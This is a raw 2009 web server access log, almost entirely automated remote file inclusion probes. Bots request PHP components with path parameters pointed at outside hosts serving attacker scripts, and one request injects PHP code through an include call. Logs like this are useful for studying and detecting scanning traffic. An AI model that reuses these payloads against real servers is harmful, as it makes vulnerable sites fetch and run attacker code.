218.208.21.7 - - [16/Apr/2009:19:00:56 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.208.21.7 - - [16/Apr/2009:19:00:56 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.208.21.7 - - [16/Apr/2009:19:00:56 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
69.73.168.129 - - [16/Apr/2009:19:01:42 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
69.73.168.129 - - [16/Apr/2009:19:01:42 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://aldeanos.com/WEB-INF/lib/.../www??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
86.109.98.47 - - [16/Apr/2009:19:05:27 -0500] "GET /logs/access_log.1238112000/ashnews.php?pathtoashnews=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
86.109.98.47 - - [16/Apr/2009:19:05:27 -0500] "GET /logs/ashnews.php?pathtoashnews=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
86.109.98.47 - - [16/Apr/2009:19:05:27 -0500] "GET /ashnews.php?pathtoashnews=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.175.122.228 - - [16/Apr/2009:19:15:23 -0500] "GET /logs/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.175.122.228 - - [16/Apr/2009:19:15:23 -0500] "GET /errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.175.122.228 - - [16/Apr/2009:19:15:25 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.175.122.228 - - [16/Apr/2009:19:15:28 -0500] "GET /logs/access_log.1225238400/errors.php?error=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.164.167.210 - - [16/Apr/2009:19:16:23 -0500] "GET /errors.php?error=http://www.hnizdil-kola.cz//components/com_virtuemart/1.txt?? HTTP/1.0" 404 281 "-""Mozilla/5.0"
76.164.167.210 - - [16/Apr/2009:19:16:23 -0500] "GET /logs/errors.php?error=http://www.hnizdil-kola.cz//components/com_virtuemart/1.txt?? HTTP/1.0" 404 286 "-""Mozilla/5.0"
76.164.167.210 - - [16/Apr/2009:19:16:23 -0500] "GET /logs/access_log.1225238400/errors.php?error=http://www.hnizdil-kola.cz//components/com_virtuemart/1.txt?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
76.164.167.210 - - [16/Apr/2009:19:16:23 -0500] "GET /logs/access_log.1225843200/errors.php?error=http://www.hnizdil-kola.cz//components/com_virtuemart/1.txt?? HTTP/1.0" 404 308 "-""Mozilla/5.0"
174.132.225.212 - - [16/Apr/2009:19:17:36 -0500] "GET /logs/errors.php?error=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
174.132.225.212 - - [16/Apr/2009:19:17:36 -0500] "GET /errors.php?error=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
200.213.0.1 - - [16/Apr/2009:19:17:53 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
200.213.0.1 - - [16/Apr/2009:19:17:53 -0500] "GET /logs/access_log.1236643200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
200.213.0.1 - - [16/Apr/2009:19:17:53 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
200.213.0.1 - - [16/Apr/2009:19:17:55 -0500] "GET /logs/access_log.1234569600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
174.132.225.212 - - [16/Apr/2009:19:20:22 -0500] "GET /errors.php?error=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
83.142.25.74 - - [16/Apr/2009:19:23:57 -0500] "GET /logs//public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://dhcom.co.kr/pds/photo/child.gif???? HTTP/1.1" 404 333 "-""libwww-perl/5.819"
83.142.25.74 - - [16/Apr/2009:19:23:57 -0500] "GET //public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=http://dhcom.co.kr/pds/photo/child.gif???? HTTP/1.1" 404 328 "-""libwww-perl/5.819"
174.132.225.203 - - [16/Apr/2009:19:27:05 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.823"
174.132.225.203 - - [16/Apr/2009:19:27:05 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.823"
211.43.212.111 - - [16/Apr/2009:19:32:45 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.43.212.111 - - [16/Apr/2009:19:32:45 -0500] "GET /logs/access_log.1233446400//modules/4nAlbum/public/displayCategory.php?basepath=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
211.43.212.111 - - [16/Apr/2009:19:32:45 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.43.212.111 - - [16/Apr/2009:19:32:54 -0500] "GET /logs/access_log.1234051200//modules/4nAlbum/public/displayCategory.php?basepath=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
83.142.25.74 - - [16/Apr/2009:19:39:42 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dhcom.co.kr/pds/photo/child.gif???? HTTP/1.1" 404 332 "-""libwww-perl/5.819"
83.142.25.74 - - [16/Apr/2009:19:39:42 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dhcom.co.kr/pds/photo/child.gif???? HTTP/1.1" 404 327 "-""libwww-perl/5.819"
64.56.65.106 - - [16/Apr/2009:20:07:26 -0500] "GET /logs/appserv/main.php?http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.819"
64.56.65.106 - - [16/Apr/2009:20:07:26 -0500] "GET /appserv/main.php?http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.819"
41.250.251.52 - - [16/Apr/2009:20:42:15 -0500] "GET /logs/index.php?server=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
41.250.251.52 - - [16/Apr/2009:20:42:21 -0500] "GET /index.php?server=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
216.228.189.120 - - [16/Apr/2009:20:42:39 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:42:41 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:42:51 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:42:52 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:42:55 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:42:56 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:12 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:13 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:15 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:16 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:26 -0500] "GET /?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.811"
216.228.189.120 - - [16/Apr/2009:20:43:27 -0500] "GET /logs/?path%5Bdocroot%5D=http://membres.lycos.fr/boter001/idd.txt??? HTTP/1.1" 200 185881 "-""libwww-perl/5.811"
41.250.251.52 - - [16/Apr/2009:20:55:15 -0500] "GET /logs/index.php?seite=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
41.250.251.52 - - [16/Apr/2009:20:55:21 -0500] "GET /index.php?seite=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
65.55.106.146 - - [16/Apr/2009:21:03:03 -0500] "GET /logs/access_log.1167696000 HTTP/1.0" 200 1007 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.25.147.157 - - [16/Apr/2009:21:11:19 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:19 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:19 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:19 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:20 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:21 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:21 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.25.147.157 - - [16/Apr/2009:21:11:21 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.196.124.252 - - [16/Apr/2009:21:11:39 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:39 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:40 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:40 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:41 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:41 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:41 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:11:42 -0500] "GET //accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
220.133.32.123 - - [16/Apr/2009:21:12:58 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:12:59 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:13:05 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:13:06 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
41.250.251.52 - - [16/Apr/2009:21:15:52 -0500] "GET /logs/index.php?root_PATH=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
41.250.251.52 - - [16/Apr/2009:21:15:58 -0500] "GET /index.php?root_PATH=http://vipsbr.50webs.com/test.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
89.108.73.84 - - [16/Apr/2009:21:16:03 -0500] "GET /logs//accounts/inc/errors.php?error=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.108.73.84 - - [16/Apr/2009:21:16:04 -0500] "GET //accounts/inc/errors.php?error=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.108.73.84 - - [16/Apr/2009:21:16:09 -0500] "GET /logs//accounts/inc/errors.php?error=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.108.73.84 - - [16/Apr/2009:21:16:09 -0500] "GET //accounts/inc/errors.php?error=http://broadreachrecruiting.com/postings/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.55.106.145 - - [16/Apr/2009:21:22:33 -0500] "GET /logs/access_log.1182038400 HTTP/1.0" 200 1293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.179.176 - - [16/Apr/2009:21:23:28 -0500] "GET /logs/access_log.1236470400/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:23:28 -0500] "GET /logs/access_log.1237248000/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:23:28 -0500] "GET /logs/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:23:28 -0500] "GET /modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.53.250.25 - - [16/Apr/2009:21:28:57 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.sumsel.polri.go.id/intel/._private//mbonx/rr.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
202.53.250.25 - - [16/Apr/2009:21:28:57 -0500] "GET /environment.php?DIR_PREFIX=http://www.sumsel.polri.go.id/intel/._private//mbonx/rr.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:33:56 -0500] "GET /logs/:3128/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:33:56 -0500] "GET /:3128/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:03 -0500] "GET /logs/:1080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:04 -0500] "GET /:1080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:05 -0500] "GET /logs/32000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:05 -0500] "GET /32000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:06 -0500] "GET /logs/8080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:06 -0500] "GET /8080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:07 -0500] "GET /logs/8080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:07 -0500] "GET /8080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:08 -0500] "GET /logs/32000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:08 -0500] "GET /logs/:23000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:09 -0500] "GET /32000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:09 -0500] "GET /:23000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:11 -0500] "GET /logs/:1080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:11 -0500] "GET /logs/:3128/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:11 -0500] "GET /logs/:23000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:12 -0500] "GET /:1080/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:12 -0500] "GET /:3128/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
81.196.124.252 - - [16/Apr/2009:21:34:12 -0500] "GET /:23000/accounts/inc/errors.php?error=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:21:36:41 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:21:36:44 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:21:36:46 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:21:36:49 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
220.133.32.123 - - [16/Apr/2009:21:49:25 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:49:31 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:50:18 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.69"
220.133.32.123 - - [16/Apr/2009:21:50:19 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
84.45.45.133 - - [16/Apr/2009:21:51:42 -0500] "GET /logs//index.php?visualizar=http://www.urlaubsforum.eu////components/com_user/log.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
84.45.45.133 - - [16/Apr/2009:21:51:42 -0500] "GET //index.php?visualizar=http://www.urlaubsforum.eu////components/com_user/log.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
72.55.179.176 - - [16/Apr/2009:21:57:05 -0500] "GET /modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:57:05 -0500] "GET /logs/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:57:05 -0500] "GET /logs/access_log.1236470400/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.55.179.176 - - [16/Apr/2009:21:57:05 -0500] "GET /logs/access_log.1237248000/modify.php?dir_module=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.239.112.19 - - [16/Apr/2009:21:58:24 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/windiayu35/idq.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
195.239.112.19 - - [16/Apr/2009:21:58:24 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/windiayu35/idq.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
207.182.147.210 - - [16/Apr/2009:22:17:37 -0500] "GET /?DOCUMENT_ROOT=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
207.182.147.210 - - [16/Apr/2009:22:17:48 -0500] "GET /?DOCUMENT_ROOT=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
207.182.147.210 - - [16/Apr/2009:22:17:53 -0500] "GET /logs/?DOCUMENT_ROOT=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
207.182.147.210 - - [16/Apr/2009:22:17:53 -0500] "GET /logs/?DOCUMENT_ROOT=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:22:19:16 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:22:19:16 -0500] "GET /logs//accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:22:19:17 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
201.6.247.157 - - [16/Apr/2009:22:19:17 -0500] "GET //accounts/inc/errors.php?error=http://thisischarlottenc.com/wp-content/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
203.127.6.42 - - [16/Apr/2009:22:19:22 -0500] "GET /logs/errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
203.127.6.42 - - [16/Apr/2009:22:19:23 -0500] "GET /errors.php?error=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
203.127.6.42 - - [16/Apr/2009:22:23:02 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
203.127.6.42 - - [16/Apr/2009:22:23:03 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.fuscaclubedealagoas.com.br/vnc/albania.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
189.35.16.44 - - [16/Apr/2009:22:23:18 -0500] "GET /logs/modify.php?dir_module=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.817"
189.35.16.44 - - [16/Apr/2009:22:23:18 -0500] "GET /logs/modify.php?dir_module=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.817"
189.35.16.44 - - [16/Apr/2009:22:23:23 -0500] "GET /modify.php?dir_module=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.817"
189.35.16.44 - - [16/Apr/2009:22:23:23 -0500] "GET /modify.php?dir_module=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.817"
77.221.130.18 - - [16/Apr/2009:22:23:53 -0500] "GET /appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.18 - - [16/Apr/2009:22:23:53 -0500] "GET /logs/access_log.1231200000/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.221.130.18 - - [16/Apr/2009:22:23:53 -0500] "GET /logs/appserv/main.php?appserv_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
